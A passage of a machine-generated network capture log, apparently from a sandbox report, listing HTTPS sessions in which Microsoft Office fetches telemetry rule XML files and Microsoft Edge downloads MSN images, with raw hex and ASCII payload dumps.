3ig{-0t^?{LDZQ+:pwFl,,-~<u[umei=v"~fk~_i162quGKFl3Qr,h>ZWlw_%L hB!r=KLl>_:I]j+~4RNnV )m
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: 38 62 32 79 08 a3 1f 4c 57 b9 29 60 21 04 a4 d5 b6 7d 34 27 9a 72 9b e5 57 67 9f ea df 11 35 5d 43 e2 56 87 ac e9 f1 5a 45 2e a7 f6 52 b7 2d 6d 1b dc c2 fb fc 87 5f 37 68 dd 86 57 e7 1f 77 15 13 6b 9e 33 f1 1f c4 08 1e 05 d4 2f 1a ce e7 c9 b1 92 38 02 98 c3 10 36 ab e0 00 55 4f af 05 73 5e a5 e1 df 0f 78 5b 4c b1 d1 ee 6c 34 a8 20 d4 f4 d9 49 9e 39 71 75 1c 88 4e 72 a5 f2 51 89 fa 62 ba 2d 41 11 74 db ab 58 f4 f9 23 d3 75 06 59 a1 b4 6d 8e 90 f3 91 e5 9f bc 83 39 cf 20 9a f1 31 19 d6 4f 87 9a 70 5c cd 2b 2b 2f d4 f5 28 e5 38 fa b6 8c a3 ca 9f f3 3f d0 f2 dd 2b e1 5f 8c f5 68 75 39 3c 49 2e e5 b6 88 1b b8 ef 6e de 69 a3 08 fb fc c5 5c 90 47 de e8 dc ef 3e b5 ea 5e 0d f0 0f 87 b4 78 ed 35 0f ed 08 3e d3 05 f4 37 96 92 58 db 08 61 91 c4 4e aa af 16 4e c6 2a Data Ascii: 8b2yLW)`!}4'rWg5]CVZE.R-m_7hWwk3/86UOs^x[Ll4 I9quNrQb-AtX#uYm9 1Op\++/(8?+_hu9<I.ni\G>^x5>7XaNN*
2024-11-25 23:25:53 UTC	16067	IN	Data Raw: f3 cd 7a d4 71 49 6f 16 45 4a 4d ec cf 3c 79 52 59 39 dc d2 b3 7f c0 54 56 8f 86 fc 3f aa eb d2 5e 45 a5 2a cb 2d 9d b3 5d 4e ad 22 26 d8 93 ef 11 b8 8d c4 7a 0c 9a ef 5b c0 fe 1b 91 54 88 b5 b8 bf 87 6f d9 b7 73 e9 f7 3a fb 57 61 e0 ff 00 0b f8 63 4c b1 9e 7b 6f 0b eb 7a 94 b2 5b 14 59 6e ec 03 a4 2f c1 de a3 ca f9 b1 cf 07 d6 b3 c4 66 10 84 7d dd c9 86 1d c9 fb cc f9 e7 71 13 60 fc c3 fb d5 dd 78 47 c0 6f 7f e2 eb ad 0e e6 55 6f 2b 4b fb 52 cf b5 d6 38 f7 a0 28 cd 80 4e d1 bb a8 06 ba 6d 57 c3 1e 14 92 f1 8c eb 7d 6c de 67 cd 1a da 47 0f e1 ca 8c 57 4c de 20 b6 b2 d6 16 ef c3 f6 32 5c cb 06 92 b6 0a d7 d6 56 ee b7 4e 38 26 5e fb 71 b7 90 7f 80 70 32 6b 8f 1b 8c ad 24 a3 42 3b a7 af 6d ac 4c 69 24 fd e3 c7 3c 49 a2 e9 da 5e a0 d6 76 f7 d0 5f 08 a2 94 7d Data Ascii: zqIoEJM<yRY9TV?^E*-]N"&z[Tos:WacL{oz[Yn/f}q`xGoUo+KR8(NmW}lgGWL 2\VN8&^qp2k$B;mLi$<I^v_}
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: 25 54 1f 29 79 00 7f ac 4e 9c e2 d5 e7 c1 8f 0e 69 fa 7d f4 97 ba e6 a1 29 8e 32 60 f2 d4 22 a9 e7 03 a1 ca fd 6b c8 3c 65 a0 69 7a 15 be 25 69 25 69 db 31 c9 e6 7f ab eb f2 9f 94 7b 57 3c b8 6f 22 75 e5 49 e1 e2 a5 e4 ed f9 24 75 3c 45 7f 67 17 ce da ff 00 0a ff 00 33 d6 6e be 33 49 03 6a 31 bf 89 fc 21 a8 44 f7 26 d9 d3 fb 52 e7 64 c8 c2 40 c4 03 d5 0f 97 f4 fd e2 7a 9c 79 5f c4 2f 0f f8 73 c4 ba e5 cd ed be b9 e0 5d 39 5a f8 c3 b2 c6 fd 94 49 9c 8d e3 7a fd c1 e5 e4 7f d7 41 f8 71 37 d2 e8 ee d8 78 a7 6d d3 8d df 37 fc b3 e7 2b fc aa de 83 a7 f8 32 6f 2a 27 b3 b9 f3 a5 bd f9 9b ed 3f 2a c5 c7 18 23 eb cd 7a d9 6e 45 96 e5 ce 55 70 d4 f9 5b 5d df f9 d8 e2 c5 62 2a d4 6a 9b 77 5e 89 7f 99 e8 9a 3f 85 7c 05 a1 78 56 e6 4b 7f 88 ca b7 2d 72 60 58 ec 75 48 Data Ascii: %T)yNi})2`"k<eiz%i%i1{W<o"uI$u<Eg3n3Ij1!D&Rd@zy_/s]9ZIzAq7xm7+2o'?#znEUp[]b*jw^?\|xVK-r`XuH
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: 37 6d c7 cb 91 c5 59 87 c3 1a 6d b4 92 6a 8b 6d 63 24 f7 32 19 a6 9e e6 4c 34 8e c7 96 27 04 92 6b 6b c3 d6 da 65 ae 8f 36 f8 2d 91 b7 7c d2 c4 c1 d9 71 fc 3b 81 23 3f 56 18 af 2f f8 8b e2 0f 10 69 fa 83 c7 a0 78 7a fb 53 95 5b fd 67 da e3 b7 5c 75 e5 9d 81 3f 86 6b c9 ab 57 30 c4 ce 34 2e db ed a2 b7 4d 96 db 75 2e 9a c2 c2 a4 9c 3d db 75 de fe 96 3c be da 0c 5d 4e 81 95 76 dc c8 3e 5e 9f 7c f4 ad ab 3b 7c f1 5c 5a 5c 78 e7 4c d5 37 f8 93 c3 5f 61 b7 ba b9 26 39 d6 ee 39 17 93 92 3e 56 27 3c d7 a1 5a c5 be 1f 32 26 ff 00 76 bf 5a cb e2 dd 34 a4 ac d2 47 87 5a 49 b6 d6 c7 03 f1 2e db cb f1 14 1f ed 5b 0f fd 0c d7 31 ab 29 56 d3 e4 0d ca ea 11 7f 51 5d 8f c5 68 1f fb 6a c5 dd b7 79 90 36 df c1 ff 00 fa f5 e5 9a af 89 a4 97 c5 50 68 4b 67 e5 ac 1a 94 42 49 Data Ascii: 7mYmjmc$2L4'kke6-\|q;#?V/ixzS[g\u?kW04.Mu.=u<]Nv>^\|;\|\Z\xL7_a&99>V'<Z2&vZ4GZI.[1)VQ]hjy6PhKgBI

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.6	49917	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:53 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:54 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:54 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 89e8b03d-001e-0065-5291-3f0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232554Z-174f7845968px8v7hC1EWR08ng0000000uug0000000005m3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:54 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.6	49918	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:53 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:54 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:54 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 4f79ec39-601e-0070-0891-3fa0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232554Z-174f7845968jrjrxhC1EWRmmrs0000000urg0000000004sk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:54 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.6	49919	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:54 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:54 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:54 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: a1da7612-c01e-0014-5d80-3fa6a3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232554Z-174f7845968xr5c2hC1EWRd0hn0000000bdg00000000042k x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:54 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.6	49923	104.117.182.56	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:54 UTC	634	OUT	GET /tenant/amp/entityid/BB1msDML.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:54 UTC	518	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msDML Last-Modified: Sun, 17 Nov 2024 00:54:30 GMT X-Source-Length: 86931 X-Datacenter: eastap X-ActivityId: 9823d744-1753-43fb-8aac-d76b0a0a8d0e Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 86931 Cache-Control: public, max-age=48567 Expires: Tue, 26 Nov 2024 12:55:21 GMT Date: Mon, 25 Nov 2024 23:25:54 GMT Connection: close
2024-11-25 23:25:54 UTC	15866	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-25 23:25:54 UTC	16384	IN	Data Raw: 22 99 f9 6b 19 8e 77 33 6f 51 d3 7b 52 bb 5c f6 1a ae 74 35 d8 43 c0 24 41 d4 13 73 6c 8c cc 2f 4d d1 f5 fd 4d 50 7b cd a2 db d8 e2 20 e1 1a c8 b8 91 68 e6 be 44 f7 f7 5e 26 24 72 f7 ec 5f 50 a2 05 5a 67 0b b2 64 43 da e2 08 1b c2 d3 a5 b5 4f cd 78 45 c7 3f ca bf b9 78 63 1f 24 cc 4f 2e dc 6f fb 3d 47 ee 31 59 98 4c 6a 66 47 95 84 ac 7e b7 af a9 d2 d3 73 81 6e eb 9a 0e 21 91 8c 94 a8 b1 ad 30 64 98 33 bd 61 c8 95 e5 fd b0 e6 d1 a6 69 10 48 aa 06 fe 42 0c c5 ef 7b dd 70 78 f2 cf 3f 24 45 cf 7f c9 d9 9e 38 61 86 53 51 b4 08 67 fe a4 13 15 28 cf 22 c7 41 3f e1 74 81 6f e2 5e 8a 8f b6 3a 2a c7 0f 70 b1 dc 9c d3 f7 12 17 c4 19 f1 0b da 5b 7e 56 5e 8a 83 5a de bb a7 68 3f ad d2 fe 77 b1 1b 32 5e d6 78 63 1d 7b 4c fd 9e 3e 13 33 d3 bc 47 dd f6 b6 96 d4 68 73 1c Data Ascii: "kw3oQ{R\t5C$Asl/MMP{ hD^&$r_PZgdCOxE?xc$O.o=G1YLjfG~sn!0d3aiHB{px?$E8aSQg("A?to^:*p[~V^Zh?w2^xc{L>3Ghs
2024-11-25 23:25:54 UTC	1745	IN	Data Raw: 67 96 31 94 54 c3 4c 73 9c 66 e2 68 5d 46 00 03 80 c6 48 69 27 2b 7e 91 cb 8a f2 3e d0 79 73 c3 03 4c 86 cc 8b 83 9d c0 d2 01 d5 7a 2a cf 34 e9 3d c6 74 c2 0e 86 4e 97 17 e2 bc b8 7f 78 be a3 ea 9a 75 1a 0e 11 1f 19 68 82 d9 ca da 6b c5 65 3b 45 1c cd cf 46 28 6e 26 98 8d d3 61 a3 b3 fa 2d fa d5 1b 5b a5 a4 4f f6 94 06 03 1f a9 84 cb 49 3c db 70 b2 dc f0 34 6b 65 e0 58 0f 3b 48 91 e2 a4 29 e3 a2 5d 2d 02 6c 26 e2 73 d8 38 2c 27 91 dc c5 c7 58 dd 5d ca ac 6b a3 47 80 cd 01 b1 20 d8 99 83 23 28 52 2c ab d4 b3 f4 83 49 82 d2 05 9b ef 8f 32 ab 0c 16 b6 c4 5e fc ac 94 25 ae 76 b8 70 81 33 96 5b 51 12 ce e4 b3 45 ed 8d eb 96 cb bf 85 a7 6e b6 bd 97 b0 a0 fa 6e a6 30 0b 09 03 15 c9 00 eb 99 13 c5 79 ba 1d 3b ab e2 38 9a 19 4c 09 71 70 6c 65 00 bb dc b6 1a fa 5d Data Ascii: g1TLsfh]FHi'+~>ysLz*4=tNxuhke;EF(n&a-[OI<p4keX;H)]-l&s8,'X]kG #(R,I2^%vp3[QEnn0y;8Lqple]
2024-11-25 23:25:54 UTC	16384	IN	Data Raw: 72 b2 ac 70 9c 8b 29 88 de ef f1 d9 ed e9 50 a0 c0 e2 61 87 f8 88 1e 1a 22 31 35 8d 3b cc f2 9f f2 5f 1f ac ea d4 9e 03 2a 3c 92 05 c3 89 12 7f 4d ac 48 f1 5a 1f bc ab 4a a9 c5 55 ce c0 cb 4f ea 23 97 2d ed 38 05 d1 3f c7 99 ff 00 75 b1 8f 34 47 78 ad fe 8f a4 8a a6 c0 16 93 a7 c4 2d c2 fa a1 cd 37 bd ae 71 0d bc ea d1 a7 85 97 82 a7 ed 4a c2 a7 f6 b2 c3 04 df 08 16 d2 e0 95 ed 99 ed 70 c2 de e3 66 5a 30 b4 16 92 67 f5 11 fa 5b 1c f5 53 3e 09 c6 95 1e 58 ca c9 6d 06 88 0e 02 1d a4 d8 ff 00 e6 4e 14 62 c2 a6 01 ac 62 10 23 33 bd 11 b5 05 5f db 46 a3 e2 83 44 5c cb a7 94 81 02 22 40 28 76 fb 5a ab 1e 59 14 b7 cc c8 69 90 de 62 64 17 70 8f 44 be 3c ed 7a f1 a6 97 51 4f b6 d1 86 a5 1a af 3a 0a 6d 93 e2 db 78 ad 3e 96 95 7e 94 12 e0 00 76 a5 a6 5c 00 bc 61 3e Data Ascii: rp)Pa"15;_*<MHZJUO#-8?u4Gx-7qJpfZ0g[S>XmNbb#3_FD\"@(vZYibdpD<zQO:mx>~v\a>
2024-11-25 23:25:54 UTC	16384	IN	Data Raw: ab 88 4c 21 08 77 04 64 49 54 19 88 c6 a8 04 b1 18 bb 01 07 8a 61 69 1f e4 a4 d2 08 9e 8e 1a e7 bd dc a0 71 25 0a 25 fa 0b 66 79 22 f0 c0 00 42 53 bc 51 c6 d3 66 d5 a8 1d 26 e2 79 2c d6 c3 9f c3 ec 8a c2 62 f7 29 10 ae 22 99 ce e6 90 d1 97 90 59 c6 4d 53 3e 08 bc d2 70 cb a5 52 47 e0 b0 13 aa 7b 80 c1 96 57 84 13 4b ac 26 fa ca 3a 88 15 0c 38 d8 72 cf 82 99 d9 a4 6f 2b e9 ab b2 88 70 73 a0 16 91 27 3e 1e 0b 2a ab 8b fc 89 8f 34 7d 6e 95 92 4e 2c 52 67 2b 7a ac 97 34 b7 4b 64 a6 2b ba f2 99 88 d3 3c 97 4d d8 46 72 99 73 ac f9 28 02 a7 2e 00 ab 64 e2 cf 5e 69 a2 8b 9d 61 03 8f 35 dd c2 5e 09 8b 08 13 a6 8b 47 a7 78 35 04 da 01 8c c4 c7 cc 28 9d a1 a6 31 13 2a 7d 16 50 bb 88 79 d0 34 58 0d bf 44 75 26 cb 1b 51 e0 00 6f 03 86 64 7d 82 cd a9 84 93 a9 13 ae 67 Data Ascii: L!wdITaiq%%fy"BSQf&y,b)"YMS>pRG{WK&:8ro+ps'>4}nN,Rg+z4Kd+<MFrs(.d^ia5^Gx5(1}Py4XDu&Qod}g
2024-11-25 23:25:54 UTC	7952	IN	Data Raw: a6 60 32 a7 3d c3 ea 7e a8 7c c6 cd 73 4e d2 79 10 3d 0a 62 19 6a d5 91 05 41 52 92 53 09 73 c1 30 5e 53 4a 7a 2e 11 ca ea b6 a8 5e 61 23 68 49 c3 f4 41 df 52 9d 30 dc d0 63 e6 50 42 c9 90 85 b1 4c 71 d1 25 04 62 ab ca a9 e0 a9 30 66 b0 99 29 59 66 a8 a0 27 2a 22 c5 45 76 68 07 93 f0 7c e6 ba 25 87 fd d3 f7 51 02 cd d9 ef 55 3b a7 6a 64 91 74 c7 2c 87 cf 35 64 e4 96 3d de f5 77 e4 90 41 12 4e 51 68 41 94 58 71 00 70 08 35 11 10 67 12 5b b5 4d 82 73 e3 c1 0e e1 05 04 90 54 35 2a db 9e c5 11 aa 0c 45 33 a8 f5 56 eb 68 52 9b aa b3 21 04 b6 eb e6 8a f2 f0 41 0d 6c 8c 87 0d 3c 10 45 54 b2 53 33 d8 99 50 5b 42 12 c5 93 06 a8 6a e5 31 3f 3f 8a 54 dc ca 01 b8 9c d7 0f 7a 8b cd 85 bc fd cb b4 5c f3 22 67 c9 01 cd cb de aa 77 8a e6 aa 77 c4 80 a4 c9 d3 ee 95 7d aa Data Ascii: `2=~\|sNy=bjARSs0^SJz.^a#hIAR0cPBLq%b0f)Yf'"Evh\|%QU;jdt,5d=wANQhAXqp5g[MsT5E3VhR!Al<ETS3P[Bj1??Tz\"gww}
2024-11-25 23:25:54 UTC	12216	IN	Data Raw: 71 09 0f c6 4d a6 3f de 7e 89 fc 70 9f 96 5e e9 bd 4b bf d5 1e 09 ce ea f0 8b d4 1e 6d fc 4a f9 e8 91 f8 c7 d6 54 1d 58 0f d4 06 c6 4f dd 2f 8e 15 f2 cb df fe fe ff 00 da 7f db f8 26 fe f6 74 78 f3 20 7b d7 ce 45 4a 45 c3 13 c9 da 07 b9 4d ce a3 7b 8f 07 7d 53 f8 f1 29 f2 e4 fa 10 ea 9e 35 ac dd 92 3e a5 5f ef 8f fa a0 7f 88 7d 17 ce 5b 07 42 d3 b5 51 24 66 d3 c2 df f5 2b f8 e1 9f cb 2f a2 3b af 04 7f 6a df e6 3f 45 11 d6 da f5 5b e6 e5 f3 63 55 bc 80 f3 8f 71 51 35 5b 17 71 fe 6f c1 2f 8f 13 f9 72 7d 30 f5 cc 1f f2 0f 27 7e 08 7f de b0 e9 50 7f 30 fa 2f 9c 8a f4 ef 67 1f 32 a1 df 6f 27 fc f9 2a d1 08 f9 32 7d 23 f7 61 c2 d5 40 f3 1f 45 7f b8 1f ea 03 c6 fe e6 af 9b 97 b5 c3 e0 70 f3 5d 89 b1 67 10 55 69 84 eb 97 d3 85 77 45 aa 37 f9 a0 fa 85 13 59 c7 fe Data Ascii: qM?~p^KmJTXO/&tx {EJEM{}S)5>_}[BQ$f+/;j?E[cUqQ5[qo/r}0'~P0/g2o'*2}#a@Ep]gUiwE7Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.6	49925	104.117.182.56	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:54 UTC	634	OUT	GET /tenant/amp/entityid/BB1msFQA.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:54 UTC	519	IN	HTTP/1.1 200 OK Last-Modified: Mon, 16 Sep 2024 13:47:16 GMT Access-Control-Allow-Origin: * X-Datacenter: eastus X-ActivityId: ff79e93a-9960-4b77-a778-af0a49b23005 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msFQA X-Source-Length: 67183 Content-Length: 67183 Cache-Control: public, max-age=181754 Expires: Thu, 28 Nov 2024 01:55:08 GMT Date: Mon, 25 Nov 2024 23:25:54 GMT Connection: close
2024-11-25 23:25:54 UTC	15865	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-25 23:25:54 UTC	16384	IN	Data Raw: d3 5f 5b a3 b9 4e 4b 44 b6 25 ed b9 ea c3 8b fa b2 eb f0 8a 5d d8 7f 89 9f 01 1f a8 f1 90 dd 5e a7 3b bf cc f5 69 fd 77 8c 86 f7 19 ad 71 f7 58 e3 38 65 d6 32 eb 19 c4 76 fb b8 f1 dc 5f 2b 81 ab cc d3 f9 9d 2b 8e ab ff 00 e9 f1 1d 91 f7 9f 25 0f f8 89 f2 e8 df f6 65 ef 47 a3 1f f8 83 87 7d 68 54 8f 32 7e d3 8c e1 97 fe 5d 63 3c 7b 7b 6f 8e ad ff 00 e9 f1 1f e5 f7 87 df 78 9c b8 2a dc f2 82 f6 9c b1 fa cf 05 2f ee 5b bd 35 ec 3b a3 f5 0e 16 5b ab 43 fa 91 ce a7 ff 00 3f 9b 77 1d b9 5f 17 c7 be af 05 db 51 18 f9 df 56 93 c3 87 a3 1e f9 7f f9 1e da e2 29 cb 74 a2 fb 9a 35 f3 23 a4 5f a4 2f f2 f0 94 be ae f9 3c 3a e7 7e f3 b6 9a e3 ef eb fb bd b5 39 df e4 7a 3b 6b 49 5b 68 97 e9 05 2a d2 d2 3b 3d 24 6d 0f 68 c2 aa c3 b1 37 0b 90 55 86 4d ca b8 0c 04 30 18 c9 Data 